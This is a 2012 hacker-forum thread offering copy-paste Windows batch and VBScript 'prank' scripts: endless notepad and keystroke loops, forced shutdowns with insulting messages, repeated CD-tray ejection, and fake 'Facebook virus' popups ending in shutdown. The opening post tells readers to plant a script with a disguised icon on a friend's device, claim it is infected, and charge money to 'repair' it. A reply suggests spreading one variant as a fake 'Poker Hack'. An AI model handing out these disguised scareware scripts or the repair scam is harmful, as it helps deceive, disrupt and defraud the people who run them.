| Notepad coding trick [ .bat + .vbs ] | |
|
Author | Message |
---|
awanFluFy Global Moderator
Posts : 83 Points : 2362 Reputation : 1387 Join date : 2012-02-07 Age : 33 Location : 2.0.0.0
| Subject: Notepad coding trick [ .bat + .vbs ] 17.03.12 5:27 | |
| >
Special to all of H.A.T.E member , enjoy and have fun
Source : xXxXxXxXxXx Post : [You must be registered and logged in to see this link.] Forum : [You must be registered and logged in to see this link.] Group : [You must be registered and logged in to see this link.]
Step to do this trick a. Open notepad b. choose which trick you want to make/do c. Copy the code to your notepad d. Save it and enjoy the trick
Benefit from this trick a. This trick is just for fun b. You can use this trick to fool your friends c. You also can run some business from it Ex : Borrow your friends ipad or laptop and delete all of his/her application shortcut on desktop, after that do this trick. Save the trick on desktop and change the icon. When his/her click on it, the trick will run and you can start foolling your friends by saying his/her laptop/ipad has been hacked or has been attacked by virus. Offer youself to repair it and start earn money from him. d. Enjoy and have fun on it
o1. Trick to open notepad continually
code : @ECHO off top START %SystemRoot%system32notepad.exe GOTO top | Save it as "Anything.BAT". Ex : haxor.BAT
o2. Trick to shutdown pc with message
code : @echo off msg * I hate you shutdown -c "Error! You are too jerk" -s | Save it as "Anything.BAT" in All Files. Ex : haxor.BAT
o3. Trick to pop out CD DRIVER. If you have more than one CD DRIVER , it will open all of it
code : Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop | Save it as "Anything.VBS". Ex : haxor.VBS
o4. Trick to make your keyboard press "ENTER" button simultaneously
code : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop | Save it as "Anything.VBS". Ex : haxor.VBS
o5. Trick to make autopilot notepad typing " Hello, how are you? I am good thanks ! "
code : WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Hel" WScript.Sleep 500 WshShell.SendKeys "lo " WScript.Sleep 500 WshShell.SendKeys ", ho" WScript.Sleep 500 WshShell.SendKeys "w a" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 WshShell.SendKeys "m g" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! "
| Save it as "Anything.VBS". Ex : haxor.VBS
o6. Trick to make You type "You are to jerk" simultaneously
code : Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are to jerk" loop | Save it as "Anything.VBS". Ex : haxor.VBS
o7. Trick to open your calculator application
code : @echo off :E start cmd.exe start calc.exe | Save it as "Anything.BAT". Ex : haxor.BAT
o8. Trick to make matrix falling text
code : @echo off :loop COlor 0A Title coding : awanFluFy [ [You must be registered and logged in to see this link.] ]
echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8 echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4 goto :loop | Save it as "Anything.BAT". Ex : haxor.BAT
o9. Trick to fool your friends. Just for fun....=)
code : @echo off start firefox.exe [You must be registered and logged in to see this link.] msg * Warning your Facebook has detected a virus. msg * To remove the virus click OK or close this box msg * Your Facebook account are now being removed msg * Please wait ........... msg * 2 ... msg * 15 ... msg * 22 ... msg * 36 ... msg * 44 ... msg * 59 ... msg * 64 ... msg * 77 ... msg * 82 ... msg * 86 ... msg * 92 ... msg * Please wait ........... msg * Your Facebook account has been Removed. shutdown -c "Warning! Virus Detected!" -s exit | Save it as "Anything.BAT". Ex : haxor.BAT
Step to do this trick a. Open notepad b. choose which trick you want to make/do c. Copy the code to your notepad d. Save it and enjoy the trick
Benefit from this trick a. This trick is just for fun b. You can use this trick to fool your friends c. You also can run some business from it Ex : Borrow your friends ipad or laptop and delete all of his/her application shortcut on desktop, after that do this trick. Save the trick on desktop and change the icon. When his/her click on it, the trick will run and you can start foolling your friends by saying his/her laptop/ipad has been hacked or has been attacked by virus. Offer youself to repair it and start earn money from him. d. Enjoy and have fun on it
>
Last edited by awanFluFy on 29.03.12 23:11; edited 2 times in total |
|
| |
Angel From Hell https://2img.net/h/i343.photobucket.com/albums/o442/vriga/Contributor_zpsd8ae31aa.png
Posts : 4 Points : 25 Reputation : 0 Join date : 2012-03-25
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 25.03.12 4:15 | |
| A WE Some!! April mob come soon |
|
| |
Vreaks C.E.O
Posts : 334 Points : 13290 Reputation : 9953 Join date : 2012-01-29 Age : 27 Location : 127.0.0.1
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 25.03.12 4:20 | |
| - Angel From Hell wrote:
- A WE Some!!
April mob come soon try this - Code:
-
@echo off start iexplore http://www.facebook.com/profile.php? echo Welcome to Hacker World. echo We will take your Facebook, We need fake Facebook to scaming people. pause shutdown -s -t 50 -c “Sorry Your Facebook has been Hacked” upload and share it to your friend, say "Poker Hack" But its oke, its just Prank, not virus and not hacked. |
|
| |
Angel From Hell https://2img.net/h/i343.photobucket.com/albums/o442/vriga/Contributor_zpsd8ae31aa.png
Posts : 4 Points : 25 Reputation : 0 Join date : 2012-03-25
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 25.03.12 4:33 | |
| - Quote :
- try this
- Code:
-
@echo off start iexplore http://www.facebook.com/profile.php? echo Welcome to Hacker World. echo We will take your Facebook, We need fake Facebook to scaming people. pause shutdown -s -t 50 -c “Sorry Your Facebook has been Hacked” upload and share it to your friend, say "Poker Hack" But its oke, its just Prank, not virus and not hacked. damn nice... |
|
| |
Vreaks C.E.O
Posts : 334 Points : 13290 Reputation : 9953 Join date : 2012-01-29 Age : 27 Location : 127.0.0.1
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 25.03.12 4:37 | |
| - Quote :
damn nice... yea i know... dont forget save it to .bat now we have a job |
|
| |
awanFluFy Global Moderator
Posts : 83 Points : 2362 Reputation : 1387 Join date : 2012-02-07 Age : 33 Location : 2.0.0.0
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 29.03.12 21:06 | |
| |
|
| |
Vreaks C.E.O
Posts : 334 Points : 13290 Reputation : 9953 Join date : 2012-01-29 Age : 27 Location : 127.0.0.1
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 29.03.12 22:33 | |
| haha... change the code, this code is f*ing awesome - Code:
-
@echo off start firefox.exe http://www.facebook.com/profile.php? msg * Warning your Facebook has detected a virus. msg * To remove the virus click OK or close this box msg * Your Facebook account are now being removed msg * Please wait ........... msg * 2... msg * 15 ... msg * 22 ... msg * 28 ... msg * 36 ... msg * 44 ... msg * 59 ... msg * 64 ... msg * 77 ... msg * 82 ... msg * 86 ... msg * 92 ... msg * 99 ... msg * Please wait ........... msg * Your Facebook account has been Removed. start iexplore.exe http://www.facebook.com/login.php? exit |
|
| |
Angel From Hell https://2img.net/h/i343.photobucket.com/albums/o442/vriga/Contributor_zpsd8ae31aa.png
Posts : 4 Points : 25 Reputation : 0 Join date : 2012-03-25
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 29.03.12 22:38 | |
| - Vreaks wrote:
- haha... change the code, this code is f*ing awesome
- Code:
-
@echo off start firefox.exe http://www.facebook.com/profile.php? msg * Warning your Facebook has detected a virus. msg * To remove the virus click OK or close this box msg * Your Facebook account are now being removed msg * Please wait ........... msg * 2... msg * 15 ... msg * 22 ... msg * 28 ... msg * 36 ... msg * 44 ... msg * 59 ... msg * 64 ... msg * 77 ... msg * 82 ... msg * 86 ... msg * 92 ... msg * 99 ... msg * Please wait ........... msg * Your Facebook account has been Removed. start iexplore.exe http://www.facebook.com/login.php? exit yea thats f u c k i n, gooodd! |
|
| |
awanFluFy Global Moderator
Posts : 83 Points : 2362 Reputation : 1387 Join date : 2012-02-07 Age : 33 Location : 2.0.0.0
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 29.03.12 23:09 | |
| - Vreaks wrote:
- haha... change the code, this code is f*ing awesome
- Code:
-
@echo off start firefox.exe http://www.facebook.com/profile.php? msg * Warning your Facebook has detected a virus. msg * To remove the virus click OK or close this box msg * Your Facebook account are now being removed msg * Please wait ........... msg * 2... msg * 15 ... msg * 22 ... msg * 28 ... msg * 36 ... msg * 44 ... msg * 59 ... msg * 64 ... msg * 77 ... msg * 82 ... msg * 86 ... msg * 92 ... msg * 99 ... msg * Please wait ........... msg * Your Facebook account has been Removed. start iexplore.exe http://www.facebook.com/login.php? exit 1 word...... " C.R.A.Z.Y " |
|
| |
Vreaks C.E.O
Posts : 334 Points : 13290 Reputation : 9953 Join date : 2012-01-29 Age : 27 Location : 127.0.0.1
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 29.03.12 23:30 | |
| - Quote :
-
- Code:
-
@echo off start firefox.exe http://www.facebook.com/profile.php? msg * Warning your Facebook has detected a virus. msg * To remove the virus click OK or close this box msg * Your Facebook account are now being removed msg * Please wait ........... msg * 2... msg * 15 ... msg * 22 ... msg * 28 ... msg * 36 ... msg * 44 ... msg * 59 ... msg * 64 ... msg * 77 ... msg * 82 ... msg * 86 ... msg * 92 ... msg * 99 ... msg * Please wait ........... msg * Your Facebook account has been Removed. start iexplore.exe http://www.facebook.com/login.php? exit 1 word...... " C.R.A.Z.Y " yeaaaa.... I know that.... |
|
| |
kousuke111 Private First Class
Posts : 10 Points : 70 Reputation : 0 Join date : 2012-03-27
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 31.03.12 4:30 | |
| how to change color of the "msg" the pop out dialog box |
|
| |
awanFluFy Global Moderator
Posts : 83 Points : 2362 Reputation : 1387 Join date : 2012-02-07 Age : 33 Location : 2.0.0.0
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 31.03.12 14:19 | |
| > - kousuke111 wrote:
- how to change color of the "msg"
the pop out dialog box The code is "colour 4a". The number (4) is for background colour and and the word (a) is for text colour. Example : colour 4 = red background colour , colour 3 = aqua background colour.code : 0 = Black 1 = Blue 2 = Green 3 = Aqua 4 = Red 5 = Purple 6 = Yellow 7 = White 8 = Gray 9 = Light Blue | A = Light Green B = Light Aqua C = Light Red D = Light Purple E = Light Yellow F = Bright White | Hope this will help you ......=)> |
|
| |
sensei123 Recruit
Posts : 1 Points : 5 Reputation : 0 Join date : 2012-04-07
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 07.04.12 9:50 | |
| lol newbie here..i try it..but i can't handle it..i mean i can't stop this sofware..i tryit n my PC...give me guide..ty guys |
|
| |
Vreaks C.E.O
Posts : 334 Points : 13290 Reputation : 9953 Join date : 2012-01-29 Age : 27 Location : 127.0.0.1
| Subject: Re: Notepad coding trick [ .bat + .vbs ] 07.04.12 10:05 | |
| - sensei123 wrote:
- lol newbie here..i try it..but i can't handle it..i mean i can't stop this sofware..i tryit n my PC...give me guide..ty guys
guide there, you have to read. |
|
| |
Sponsored content
| Subject: Re: Notepad coding trick [ .bat + .vbs ] | |
| |
|
| |
| Notepad coding trick [ .bat + .vbs ] | |
|